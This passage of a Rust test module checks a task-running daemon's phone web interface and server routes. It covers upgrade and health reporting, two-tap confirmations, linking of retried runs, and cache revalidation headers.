9530        // This test used to lean on the fixture's placeholder repo failing
9531        // config discovery, which left `mode = "notify"` - and a live,
9532        // unauthenticated call to the GitHub releases API inside a unit test.
9533        // GitHub allows 60 of those an hour per address, so the suite went red
9534        // on `macos-latest` and nowhere else, in bursts, and stayed red for as
9535        // long as somebody kept re-running it: every attempt spent another
9536        // request. Six reruns across four pull requests were charged to that
9537        // before it was read as a rate limit rather than a flake.
9538        //
9539        // What the assertion is about is the "already current" branch, which
9540        // is reached by there being no newer release *or* nowhere to look. The
9541        // second one needs no network and cannot be rate limited.
9542        let repo = TempDir::new().expect("repo dir");
9543        std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
9544            .expect("write magi.toml");
9545        let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
9546
9547        // It must answer 200 and leave the process alone: restarting for an
9548        // upgrade that did not happen parks the run in flight and drops every
9549        // connection to pay for nothing. A probe against a deck already on the
9550        // newest build did exactly that, which is how this case got its own
9551        // branch.
9552        let res = fx.post("/api/upgrade", None).await;
9553        assert_eq!(res.status, 200, "not 202: nothing was set in motion");
9554        let body = res.json();
9555        assert!(body["to"].is_null(), "there was no release to move to");
9556        assert!(body["parked"].is_null(), "and nothing was parked");
9557        assert!(
9558            body["detail"]
9559                .as_str()
9560                .unwrap()
9561                .contains("nothing restarted"),
9562            "{body:?}"
9563        );
9564    }
9565
9566    #[tokio::test]
9567    async fn health_reports_the_running_version_and_no_pending_upgrade_by_default() {
9568        // `mode = "off"` for the same reason as the test above: a default
9569        // fixture repo falls back to `mode = "notify"`, which would make this
9570        // route's new `update` field a live, unauthenticated GitHub call on
9571        // every assertion in this suite that happens to hit `/api/health`.
9572        let repo = TempDir::new().expect("repo dir");
9573        std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
9574            .expect("write magi.toml");
9575        let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
9576
9577        let health = fx.get("/api/health").await.json();
9578        assert_eq!(health["version"], env!("CARGO_PKG_VERSION"));
9579        assert_eq!(
9580            health["update"]["available"], false,
9581            "checking is off, which reads as \"unknown\", not \"none\""
9582        );
9583        assert!(health["update"]["to"].is_null());
9584        assert!(
9585            health["upgrade"].is_null(),
9586            "nothing has ever asked this deck to upgrade"
9587        );
9588    }
9589
9590    #[tokio::test]
9591    async fn health_reports_a_parked_upgrade_and_what_it_is_waiting_on() {
9592        let fx = Fixture::start().await;
9593        write_run(&fx.runs(), "20260905-000000-cd51", RunStatus::Implementing);
9594
9595        let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
9596        progress.parked_run = Some("20260905-000000-cd51".to_owned());
9597        progress.advance(crate::updater::Stage::Parking);
9598        crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
9599
9600        let health = fx.get("/api/health").await.json();
9601        assert_eq!(health["upgrade"]["stage"], "parking");
9602        assert_eq!(health["upgrade"]["from"], "0.5.1");
9603        assert_eq!(health["upgrade"]["to"], "0.5.2");
9604        let waiting_on = health["upgrade"]["waiting_on"]
9605            .as_str()
9606            .expect("waiting_on is set while parking a known run");
9607        assert!(waiting_on.contains("cd51"), "{waiting_on}");
9608        assert!(waiting_on.contains("implementing"), "{waiting_on}");
9609    }
9610
9611    #[tokio::test]
9612    async fn health_reports_a_finished_upgrade_with_no_waiting_on() {
9613        let fx = Fixture::start().await;
9614        let mut progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
9615        progress.advance(crate::updater::Stage::Done);
9616        crate::updater::write_progress(fx.home.path(), &progress).expect("write upgrade.json");
9617
9618        let health = fx.get("/api/health").await.json();
9619        assert_eq!(health["upgrade"]["stage"], "done");
9620        assert!(
9621            health["upgrade"]["waiting_on"].is_null(),
9622            "nothing to wait on once it is done"
9623        );
9624    }
9625
9626    #[tokio::test]
9627    async fn hand_over_advances_the_upgrade_progress_through_parking_and_restarting() {
9628        let home = TempDir::new().expect("temp home");
9629        let runs = home.path().join("runs");
9630        std::fs::create_dir_all(&runs).expect("runs dir");
9631        let ui = Ui::new(
9632            Queue::at(home.path().join("queue")),
9633            Questions::at(home.path().join("questions")),
9634            Talks::at(home.path().join("talks")),
9635            runs,
9636            home.path().to_path_buf(),
9637            PathBuf::from("/repo/magi"),
9638        )
9639        .with_launch(launch_idle);
9640        let looping = ui.looping();
9641        let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
9642            .await
9643            .expect("bind loopback");
9644        let served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
9645
9646        let progress = crate::updater::Progress::new("0.5.1".to_owned(), "0.5.2".to_owned());
9647        crate::updater::write_progress(home.path(), &progress).expect("seed progress");
9648
9649        hand_over(home.path(), &looping, served, || Ok(()))
9650            .await
9651            .expect("hand over");
9652
9653        let after = crate::updater::read_progress(home.path()).expect("progress on disk");
9654        assert_eq!(
9655            after.stage,
9656            crate::updater::Stage::Restarting,
9657            "hand_over owns the record through parking and up to restarting; \
9658             the successor is what finishes it"
9659        );
9660    }
9661
9662    #[test]
9663    fn the_upgrade_button_arms_before_it_restarts_anything() {
9664        // It ends the process the operator is talking to, and a phone in a
9665        // pocket taps things. One tap arms, the second commits.
9666        assert!(APP_JS.contains("upgrade: \"/api/upgrade\""));
9667        assert!(APP_JS.contains("Replace the binary and restart?"));
9668        assert!(APP_JS.contains("function confirmed("));
9669        // Hidden when the loop is somebody else's, matching the 409 above -
9670        // and hidden with nothing to install, matching the 200 "already
9671        // current" branch: an operator on the newest build must not be
9672        // offered a restart that would only park a run for nothing.
9673        assert!(APP_JS.contains("show(upgradeBtn, !foreign && update.available)"));
9674        // A park waits for the node in flight, up to an hour for an implement
9675        // wave. Leaving the button reading "Upgrading…" for that long is the
9676        // same mistake as an error rendered off screen: it looks wedged.
9677        assert!(
9678            APP_JS.contains("Parking, then restarting"),
9679            "the button says what it is waiting for"
9680        );
9681        // And nothing to install must give the button back rather than
9682        // pretending a restart is coming.
9683        assert!(APP_JS.contains("if (!out.to)"));
9684    }
9685
9686    #[test]
9687    fn stopping_the_loop_arms_but_starting_does_not() {
9688        // A stray tap must not leave the queue stopped overnight, so a stop is
9689        // two taps through the same helper the upgrade uses; a start stays one.
9690        assert!(APP_JS.contains("Finish the run(s) in flight, then stop claiming?"));
9691        assert!(APP_JS.contains("Stop claiming new tasks? Nothing is in flight."));
9692        assert!(APP_JS.contains("confirmed(button, question)"));
9693        // The label put back on timeout is the one saved when arming, not a
9694        // hard-coded upgrade caption that would rename the stop button.
9695        assert!(!APP_JS.contains("setText(btn, \"Update & restart\");\n    }\n  }, 6000)"));
9696        assert!(APP_JS.contains("const label = btn.textContent;"));
9697        assert!(!APP_JS.contains("Neither direction is guarded"));
9698    }
9699
9700    #[test]
9701    fn the_running_version_is_shown_regardless_of_whether_an_update_exists() {
9702        assert!(
9703            APP_JS.contains("state.health.version"),
9704            "the operator wants to know what is running even with nothing newer"
9705        );
9706        assert!(APP_JS.contains("id=\"daemon-version\"") || APP_CSS.contains(".daemon-version"));
9707    }
9708
9709    #[test]
9710    fn the_upgrade_button_names_its_destination() {
9711        assert!(
9712            APP_JS.contains("`Update to ${update.to}`"),
9713            "pressing the button should not be a surprise about what it moves to"
9714        );
9715    }
9716
9717    #[test]
9718    fn an_upgrade_in_progress_is_shown_as_stages_not_as_an_error() {
9719        for stage in ["downloading", "replaced", "parking", "restarting"] {
9720            assert!(
9721                APP_JS.contains(&format!("\"{stage}\"")),
9722                "the phone must be able to tell {stage} apart from the others"
9723            );
9724        }
9725        assert!(APP_JS.contains(".waiting_on"));
9726        // What replaced the bare "Cannot reach magi: Failed to fetch": a
9727        // fetch failing while an upgrade is in flight is not an error, it is
9728        // the sub-second gap `bind_waiting` covers, and it must not be
9729        // reported as one.
9730        assert!(APP_JS.contains("function reportUnreachableDuringUpgrade("));
9731        assert!(APP_JS.contains("reconnects on its own"));
9732    }
9733
9734    #[test]
9735    fn a_failed_upgrade_does_not_lock_the_loop_controls() {
9736        // `Stage::Failed` is terminal on the server and nothing clears it on
9737        // its own - not a fresh start, not time passing - so a full-strip
9738        // takeover for it (the way the busy stages take the strip over,
9739        // correctly, because those are transient) would have hidden
9740        // start/stop/park behind an upgrade notice with no way back short of
9741        // a person editing `upgrade.json` by hand or a later release
9742        // happening to succeed. The failure must instead ride along as a note
9743        // next to whatever control the loop's own state already offers.
9744        let body = &APP_JS[APP_JS.find("function renderLoop(").expect("renderLoop")
9745            ..APP_JS.find("function upgrade(").expect("upgrade")];
9746        assert!(
9747            !body.contains(
9748                "upgradeStage === \"failed\") {\n    setAttr(box, \"data-state\", \"failed\")"
9749            ),
9750            "a failed upgrade must not take the whole strip over the way it used to"
9751        );
9752        assert!(
9753            body.contains("upgradeFailNote"),
9754            "the failure has to reach the loop's own note instead"
9755        );
9756        // `quiet` and `control` are the only two places `loop-why` is set from
9757        // this function's own state; both must carry the note through, or a
9758        // future edit to either one would silently drop it again.
9759        assert_eq!(
9760            body.matches("upgradeFailNote].filter(Boolean).join")
9761                .count(),
9762            2,
9763            "both loop-why writers (quiet and control) must fold the note in"
9764        );
9765    }
9766
9767    #[test]
9768    fn an_overdue_upgrade_eventually_asks_for_a_human() {
9769        // The ceiling has to clear a full hour-long park with room to spare,
9770        // or an ordinary implement wave would be reported as a stuck upgrade.
9771        assert!(APP_JS.contains("UPGRADE_WAIT_LIMIT_MS = 70 * 60 * 1000"));
9772        assert!(APP_JS.contains("function upgradeOverdue("));
9773    }
9774
9775    #[test]
9776    fn coming_back_from_an_upgrade_says_which_version_it_landed_on() {
9777        assert!(
9778            APP_JS.contains("Updated to ${upgradeInfo.to"),
9779            "the operator who asked for the restart wants to know it worked"
9780        );
9781    }
9782
9783    #[test]
9784    fn an_error_is_visible_from_where_the_button_is() {
9785        // The alert used to sit in the flow under the header. On a phone
9786        // scrolled 13 500 px down to a run's action sheet that is off screen,
9787        // so tapping Resume and being told "the loop is running run b455
9788        // right now" looked exactly like a button that did nothing.
9789        let alert = &APP_CSS[APP_CSS.find(".alert {").expect(".alert")
9790            ..APP_CSS.find(".alert-text").expect(".alert-text")];
9791        assert!(
9792            alert.contains("position: fixed"),
9793            "an error about the thing under your thumb has to be visible from \
9794             where your thumb is: {alert}"
9795        );
9796        assert!(
9797            alert.contains("z-index: 25"),
9798            "above the dock (20) and the run-actions FAB (15), so neither \
9799             buries it: {alert}"
9800        );
9801        assert!(
9802            alert.contains("var(--tap)"),
9803            "and clear of the dock and the home indicator: {alert}"
9804        );
9805        // The FAB sits at the same height on the right. An error that covered
9806        // it would hide the button the operator reaches for next.
9807        assert!(
9808            alert.contains("var(--s4) + var(--tap) + var(--s3)"),
9809            "the FAB's column stays free: {alert}"
9810        );
9811    }
9812
9813    #[tokio::test]
9814    async fn an_older_attempt_says_what_replaced_it() {
9815        let fx = Fixture::start().await;
9816        let q = fx.queue();
9817        let runs = fx.runs();
9818        let (first, second) = ("20260901-000000-aaaa", "20260901-000000-bbbb");
9819        write_run(&runs, first, RunStatus::Stalled);
9820        write_run(&runs, second, RunStatus::Blocked);
9821
9822        let mut t = Task::new(
9823            "one task".to_owned(),
9824            "do it".to_owned(),
9825            PathBuf::from("/repo"),
9826            Source::Human,
9827        );
9828        t.runs = vec![first.to_owned(), second.to_owned()];
9829        q.put(&mut t).expect("put");
9830
9831        // Two cards with the same title and no hint which is which was the
9832        // question: "why are there two of the same, one stalled and one
9833        // blocked?" The older one now names its replacement.
9834        let rows = fx.get("/api/runs").await.json();
9835        let by = |short: &str| -> Value {
9836            rows.as_array()
9837                .unwrap()
9838                .iter()
9839                .find(|r| r["short"] == short)
9840                .cloned()
9841                .unwrap_or(Value::Null)
9842        };
9843        assert_eq!(by("aaaa")["superseded_by"], "bbbb");
9844        assert!(
9845            by("bbbb")["superseded_by"].is_null(),
9846            "the latest attempt is not superseded by anything"
9847        );
9848        // Front end: the note has to be rendered, not just carried.
9849        assert!(APP_JS.contains("run.superseded_by"));
9850        assert!(APP_JS.contains("Superseded by"));
9851    }
9852
9853    #[tokio::test]
9854    async fn a_run_s_own_detail_page_says_what_replaced_it_too() {
9855        // The list route has known this since the card fix above; the detail
9856        // route — what an operator actually opens from a notification about
9857        // a blocked run — did not, and went on showing a bare red BLOCKED
9858        // chip for a run a retry had already finished.
9859        let fx = Fixture::start().await;
9860        let q = fx.queue();
9861        let runs = fx.runs();
9862        let (first, second) = ("20260901-000000-cccc", "20260901-000000-dddd");
9863        write_run(&runs, first, RunStatus::Blocked);
9864        write_run(&runs, second, RunStatus::Merged);
9865
9866        let mut t = Task::new(
9867            "one task".to_owned(),
9868            "do it".to_owned(),
9869            PathBuf::from("/repo"),
9870            Source::Human,
9871        );
9872        t.runs = vec![first.to_owned(), second.to_owned()];
9873        q.put(&mut t).expect("put");
9874
9875        let earlier = fx.get(&format!("/api/runs/{first}")).await.json();
9876        assert_eq!(earlier["superseded_by"], "dddd");
9877        assert_eq!(earlier["latest_attempt"]["id"], second);
9878        assert_eq!(earlier["latest_attempt"]["short"], "dddd");
9879        assert_eq!(
9880            earlier["latest_attempt"]["resolved"], true,
9881            "the run that replaced it landed, so this one reads as settled"
9882        );
9883
9884        let later = fx.get(&format!("/api/runs/{second}")).await.json();
9885        assert!(
9886            later["superseded_by"].is_null(),
9887            "the latest attempt is not superseded by anything"
9888        );
9889        assert!(
9890            later["latest_attempt"].is_null(),
9891            "the latest attempt has no later attempt of its own"
9892        );
9893
9894        // Front end: the detail page has to read the field this route now
9895        // carries, downgrade the chip, and link to the run that replaced it —
9896        // not just repeat the list card's own logic under a different name.
9897        // The link is built off `latest_attempt.id`, the server-resolved
9898        // full id, never a bare short string a client would have to guess a
9899        // full run from.
9900        assert!(APP_JS.contains("run.latest_attempt"));
9901        assert!(APP_JS.contains("data-superseded"));
9902        assert!(APP_JS.contains("#/runs/${latest.id}"));
9903    }
9904
9905    #[tokio::test]
9906    async fn a_chain_of_retries_points_the_oldest_at_the_current_head() {
9907        // A -> B -> C, all Blocked except the last. A's immediate successor
9908        // (superseded_by) is B, which is itself unresolved; what an operator
9909        // opening A's page actually needs is where the task's story stands
9910        // *now* - C, not B - without depending on whether C happens to be in
9911        // whatever page of /api/runs the client last cached.
9912        let fx = Fixture::start().await;
9913        let q = fx.queue();
9914        let runs = fx.runs();
9915        let (a, b, c) = (
9916            "20260901-000000-aaaa",
9917            "20260901-000000-bbbb",
9918            "20260901-000000-cccc",
9919        );
9920        write_run(&runs, a, RunStatus::Blocked);
9921        write_run(&runs, b, RunStatus::Blocked);
9922        write_run(&runs, c, RunStatus::Merged);
9923
9924        let mut t = Task::new(
9925            "retried twice".to_owned(),
9926            "do it".to_owned(),
9927            PathBuf::from("/repo"),
9928            Source::Human,
9929        );
9930        t.runs = vec![a.to_owned(), b.to_owned(), c.to_owned()];
9931        q.put(&mut t).expect("put");
9932
9933        let view = fx.get(&format!("/api/runs/{a}")).await.json();
9934        assert_eq!(view["superseded_by"], "bbbb", "the immediate successor");
9935        assert_eq!(
9936            view["latest_attempt"]["id"], c,
9937            "the chain's current head, not the intermediate Blocked retry"
9938        );
9939        assert_eq!(view["latest_attempt"]["resolved"], true);
9940
9941        let mid = fx.get(&format!("/api/runs/{b}")).await.json();
9942        assert_eq!(mid["latest_attempt"]["id"], c);
9943        assert_eq!(mid["latest_attempt"]["resolved"], true);
9944    }
9945
9946    #[tokio::test]
9947    async fn an_unresolved_or_unverified_successor_does_not_read_as_finished() {
9948        let fx = Fixture::start().await;
9949        let q = fx.queue();
9950        let runs = fx.runs();
9951
9952        // Still Blocked: the task is not resolved, so the older run must not
9953        // read as settled either.
9954        let (still_blocked_a, still_blocked_b) = ("20260901-000000-e001", "20260901-000000-e002");
9955        write_run(&runs, still_blocked_a, RunStatus::Blocked);
9956        write_run(&runs, still_blocked_b, RunStatus::Blocked);
9957        let mut t1 = Task::new(
9958            "still stuck".to_owned(),
9959            "do it".to_owned(),
9960            PathBuf::from("/repo"),
9961            Source::Human,
9962        );
9963        t1.runs = vec![still_blocked_a.to_owned(), still_blocked_b.to_owned()];
9964        q.put(&mut t1).expect("put");
9965        let view1 = fx.get(&format!("/api/runs/{still_blocked_a}")).await.json();
9966        assert_eq!(view1["latest_attempt"]["resolved"], false);
9967
9968        // VerifiedNoop: a candidate's own unconfirmed claim, held for a human
9969        // to check - not a confirmed finish, so this must not read as
9970        // resolved either, even though the run is done in the sense that
9971        // nothing is still running.
9972        let (noop_a, noop_b) = ("20260901-000000-e003", "20260901-000000-e004");
9973        write_run(&runs, noop_a, RunStatus::Blocked);
9974        write_run(&runs, noop_b, RunStatus::VerifiedNoop);
9975        let mut t2 = Task::new(
9976            "claims done".to_owned(),
9977            "do it".to_owned(),
9978            PathBuf::from("/repo"),
9979            Source::Human,
9980        );
9981        t2.runs = vec![noop_a.to_owned(), noop_b.to_owned()];
9982        q.put(&mut t2).expect("put");
9983        let view2 = fx.get(&format!("/api/runs/{noop_a}")).await.json();
9984        assert_eq!(
9985            view2["latest_attempt"]["resolved"], false,
9986            "an unverified no-op claim must not read as a confirmed finish"
9987        );
9988
9989        // Front end: an unresolved successor must not carry the "finished
9990        // this work" note or the muted chip treatment.
9991        assert!(APP_JS.contains("latest.resolved"));
9992    }
9993
9994    #[tokio::test]
9995    async fn a_replaced_deck_is_not_served_from_a_phone_s_cache() {
9996        let fx = Fixture::start().await;
9997        // No cache header at all meant browsers invented their own policy,
9998        // and one did: a phone went on showing "Candidates must be folded
9999        // before deleting. Run `magi fold` first." - deleted two releases
10000        // earlier - from a deck that no longer contained the sentence. The
10001        // button it named was right there, and unreachable.
10002        let js = fx.get("/app.js").await;
10003        assert_eq!(js.status, 200);
10004        let tag = js
10005            .header("etag")
10006            .expect("an etag to revalidate against")
10007            .to_owned();
10008        assert!(tag.contains(env!("CARGO_PKG_VERSION")), "tag: {tag}");
10009        assert_eq!(
10010            js.header("cache-control"),
10011            Some("no-cache, must-revalidate"),
10012            "the phone has to ask every time"
10013        );
10014
10015        // And the asking has to be cheap, or `must-revalidate` just means
10016        // "send the whole interface on every load".
10017        let again = fx
10018            .get_with("/app.js", &[("if-none-match", tag.as_str())])
10019            .await;
10020        assert_eq!(
10021            again.status, 304,
10022            "a deck it already has costs one round trip"
10023        );
10024        assert!(again.body.is_empty(), "304 carries no body");
10025
10026        // A weakened tag from a proxy still matches; a different build does
10027        // not, which is the case that has to deliver the new interface.
10028        let weak = fx
10029            .get_with("/app.js", &[("if-none-match", &format!("W/{tag}"))])
10030            .await;
10031        assert_eq!(weak.status, 304);
10032        let stale = fx
10033            .get_with("/app.js", &[("if-none-match", "\"0.0.1-1\"")])
10034            .await;
10035        assert_eq!(stale.status, 200, "an older build must be replaced");
10036        assert!(stale.body.contains("renderRunActions"));
10037    }
10038
10039    #[test]
10040    fn the_deck_never_sends_the_operator_to_a_terminal() {
10041        // The whole point of the phone UI is that a terminal is not needed.
10042        // The delete control used to answer with "Run `magi fold` first."
10043        assert!(
10044            !APP_JS.contains("Run `magi fold` first"),
10045            "the deck must offer the fold, not prescribe a shell command"
10046        );
10047        assert!(APP_JS.contains("foldRun:"));
10048        assert!(APP_JS.contains("resumeRun:"));
10049        assert!(APP_JS.contains("renderRunActions"));
10050
10051        // Folding is destructive and armed in two steps, like deleting.
10052        assert!(APP_JS.contains("armedFold"));
10053        assert!(APP_JS.contains("Yes, fold worktrees"));
10054
10055        // And the copy has to say that the two actions are opposites, because
10056        // folding throws away exactly what a resume would continue from.
10057        assert!(APP_JS.contains("can no longer be resumed"));
10058    }
10059
10060    #[test]
10061    fn a_finished_run_explains_itself_with_its_own_last_line() {
10062        // The deck used to answer "why did this stop?" with a sentence chosen
10063        // by status alone. Run e633 stalled because two judges answered with
10064        // the wrong JSON shape and its card said "The panel collapsed on
10065        // agent quota" - with `quota: []` in the record and a quota-loss
10066        // counter right above it that correctly said nothing.
10067        assert!(
10068            !APP_JS.contains("collapsed on agent quota"),
10069            "a stall must not be explained by a cause the deck did not check"
10070        );
10071        assert!(
10072            !APP_JS.contains("Review rounds ran out with findings still open, or the gate failed"),
10073            "and a block must not offer a guess with an `or` in it"
10074        );
10075
10076        // The reason it does have is `run.event`, which must reach finished
10077        // runs: gating it on movement hid the recorded truth at the one moment
10078        // the operator is reading the card to find out what happened.
10079        assert!(
10080            APP_JS.contains("setText(r.event, run.event || \"\")"),
10081            "the run's last line is rendered unconditionally"
10082        );
10083        assert!(
10084            !APP_JS.contains("moving && run.event"),
10085            "and never gated on the run still moving"
10086        );
10087
10088        // Quota keeps its own counter, fed by the number actually recorded.
10089        assert!(APP_JS.contains("lost to quota"));
10090    }
10091
10092    /// The runs tree (section) and the state chips (waiting/done) are two
10093    /// independent lenses ANDed together in `renderRuns`, and some pairings
10094    /// can never both be true for any run - every "Landed"/"Ended" run is
10095    /// done by construction, so pairing either with "Active" or "In flight"
10096    /// always rendered zero cards with the filter bar still claiming
10097    /// `Showing Ended`. `sectionCompatibleWithStateFilter` exists to catch
10098    /// that before it happens, checked against `REPRESENTATIVE_RUN_SHAPES` -
10099    /// a handful of (waiting, status) shapes standing in for the run
10100    /// lifecycle, because `cargo test` cannot execute the front end.
10101    ///
10102    /// That stand-in list is itself the part that drifted twice in review:
10103    /// once shipped with `waiting: true` paired with a done status the
10104    /// lifecycle cannot produce, then over-corrected into treating every
10105    /// waiting run as never done - which made "Waiting on you" look
10106    /// incompatible with "Done" even for the one real, reachable shape
10107    /// (Stalled/Blocked, both terminal yet still resumable) that is exactly
10108    /// that combination. This test parses the shapes and the done-rule back
10109    /// out of `APP_JS`, reimplements `runSection` and the five state
10110    /// predicates independently in Rust, and checks the resulting
10111    /// section/filter compatibility table against the lifecycle rules by
10112    /// hand - so either direction of drift fails it again.
10113    #[test]
10114    fn runs_tree_sections_and_state_chips_agree_on_what_a_run_can_be() {
10115        let shapes_marker = "const REPRESENTATIVE_RUN_SHAPES = [";
10116        let shapes_body_start =
10117            APP_JS.find(shapes_marker).expect("the shape list exists") + shapes_marker.len();
10118        let shapes_close = APP_JS[shapes_body_start..]
10119            .find("].map(")
10120            .expect("the shape list is closed by its done-computing .map(...)")
10121            + shapes_body_start;
10122        let shapes_src = &APP_JS[shapes_body_start..shapes_close];
10123
10124        let mut shapes: Vec<(bool, String, bool)> = Vec::new();
10125        for entry in shapes_src.split('{').skip(1) {
10126            let waiting = entry.contains("waiting: true");
10127            let dead = entry.contains("live: \"dead\"");
10128            let status_at =
10129                entry.find("status: \"").expect("each shape names a status") + "status: \"".len();
10130            let status_end = entry[status_at..]
10131                .find('"')
10132                .expect("the status string is closed")
10133                + status_at;
10134            shapes.push((waiting, entry[status_at..status_end].to_string(), dead));
10135        }
10136        assert!(shapes.len() >= 6, "parsed shapes: {shapes:?}");
10137
10138        // The done rule itself (`!["implementing"].includes(shape.status)`),
10139        // read out of the source rather than hardcoded, so a renamed
10140        // in-flight status can't silently make every parsed shape "done".
10141        let done_rule_marker = "done: !";
10142        let done_rule_at = APP_JS[shapes_close..]
10143            .find(done_rule_marker)
10144            .expect("the done rule follows the shape list")
10145            + shapes_close
10146            + done_rule_marker.len();
10147        let includes_at = APP_JS[done_rule_at..]
10148            .find(".includes(shape.status)")
10149            .expect("the done rule ends in .includes(shape.status)")
10150            + done_rule_at;
10151        let not_done: Vec<&str> = APP_JS[done_rule_at..includes_at]
10152            .trim()
10153            .trim_start_matches('[')
10154            .trim_end_matches(']')
10155            .split(',')
10156            .map(|s| s.trim().trim_matches('"'))
10157            .filter(|s| !s.is_empty())
10158            .collect();
10159
10160        let shapes: Vec<(bool, String, bool, bool)> = shapes
10161            .into_iter()
10162            .map(|(waiting, status, dead)| {
10163                let done = !not_done.contains(&status.as_str());
10164                (waiting, status, dead, done)
10165            })
10166            .collect();
10167
10168        // `runSection` reimplemented from assets/ui/app.js: `waiting` wins
10169        // outright, then merged/ready land, stalled/blocked/failed/
10170        // verified_noop end, and everything else is still in flight.
10171        fn run_section(waiting: bool, status: &str, dead: bool) -> &'static str {
10172            if waiting {
10173                return "waiting";
10174            }
10175            if dead
10176                && !matches!(
10177                    status,
10178                    "merged"
10179                        | "ready"
10180                        | "stalled"
10181                        | "blocked"
10182                        | "failed"
10183                        | "verified_noop"
10184                        | "superseded"
10185                )
10186            {
10187                return "stale";
10188            }
10189            match status {
10190                "merged" | "ready" => "landed",
10191                "stalled" | "blocked" | "failed" | "verified_noop" | "superseded" => "ended",
10192                _ => "flight",
10193            }
10194        }
10195
10196        // RUN_STATE_FILTERS' six `match` functions, reimplemented the same
10197        // way.
10198        fn filter_matches(filter_key: &str, waiting: bool, dead: bool, done: bool) -> bool {
10199            match filter_key {
10200                "active" => !done,
10201                "flight" => !done && !waiting && !dead,
10202                "stale" => !done && !waiting && dead,
10203                "waiting" => waiting,
10204                "done" => done,
10205                "all" => true,
10206                other => panic!("unknown RUN_STATE_FILTERS key: {other}"),
10207            }
10208        }
10209
10210        let compatible = |section: &str, filter_key: &str| {
10211            shapes.iter().any(|(waiting, status, dead, done)| {
10212                run_section(*waiting, status, *dead) == section
10213                    && filter_matches(filter_key, *waiting, *dead, *done)
10214            })
10215        };
10216
10217        // One row per RUN_SECTIONS key, in RUN_STATE_FILTERS' own order
10218        // (active, flight, stale, waiting, done, all) - hand-derived from the
10219        // lifecycle, independently of whatever REPRESENTATIVE_RUN_SHAPES
10220        // currently contains.
10221        let expected = [
10222            ("waiting", [true, false, false, true, true, true]),
10223            ("stale", [true, false, true, false, false, true]),
10224            ("flight", [true, true, false, false, false, true]),
10225            ("landed", [false, false, false, false, true, true]),
10226            ("ended", [false, false, false, false, true, true]),
10227        ];
10228        let filter_keys = ["active", "flight", "stale", "waiting", "done", "all"];
10229
10230        for (section, wants) in expected {
10231            for (filter_key, want) in filter_keys.iter().zip(wants) {
10232                assert_eq!(
10233                    compatible(section, filter_key),
10234                    want,
10235                    "section {section:?} x filter {filter_key:?} should be compatible: {want}"
10236                );
10237            }
10238        }
10239
10240        // The compatibility check exists only to be acted on: both pickers
10241        // must actually consult it rather than just render its answer.
10242        assert!(
10243            APP_JS.contains("function sectionCompatibleWithStateFilter(sectionKey, filterKey)")
10244        );
10245        assert!(APP_JS.contains(
10246            "if (state.runsFilter.section && !sectionCompatibleWithStateFilter(state.runsFilter.section, key))"
10247        ));
10248        assert!(APP_JS.contains(
10249            "if (!same && !sectionCompatibleWithStateFilter(section, state.runsStateFilter))"
10250        ));
10251    }
10252
10253    #[tokio::test]
10254    async fn normalize_default_repo_leaves_an_explicit_path_untouched() {
10255        // An operator-named directory - git checkout or not - is never
10256        // second-guessed, even when it does not exist at all: only the
10257        // flag's own unmodified `.` default is ever eligible for discovery.
10258        let dir = tempfile::tempdir().expect("tempdir");
10259        let explicit = dir.path().join("not-a-checkout");
10260        std::fs::create_dir_all(&explicit).expect("create dir");
10261        assert_eq!(normalize_default_repo(explicit.clone()).await, explicit);
10262
10263        let missing = dir.path().join("does-not-exist-at-all");
10264        assert_eq!(normalize_default_repo(missing.clone()).await, missing);
10265    }
10266}